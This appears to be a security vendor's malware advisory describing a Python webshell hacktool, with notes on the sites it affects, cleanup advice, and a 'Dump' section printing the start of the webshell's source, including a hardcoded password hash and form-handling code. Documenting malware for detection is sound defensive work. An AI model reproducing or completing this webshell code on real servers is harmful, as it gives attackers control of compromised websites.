Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This hacktool is a webshell which allow attackers to take control of the server.
Affecting
Any vulnerable website with python support. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Inspect your server looking for any unknown python file and remove them. Also, you can sign up with us and let our team remove the malware for you.
Dump
#!/usr/bin/env python
import sys, os, cgi, commands, time, Cookie, socket
from stat import *
from datetime import datetime
sys.stderr = open(os.devnull, 'w')
password = "a68709cddc1ddf1add82d08790080c44"
version = "0.1 [py]"
def getall(theform, nolist = False):
data = {}
for field in theform.keys():
if type(theform[field]) == type([]):
if not nolist:
data[field] = theform.getlist(field)
else:
data[field] = theform.getfirst(field)
elif theform[field].filename:
_FILES[field] = theform[field]
else:
data[field] = theform[field].value
return data
def escape(str):
return str.replace("'", "\'").replace("r", "\r").replace("n", "\n")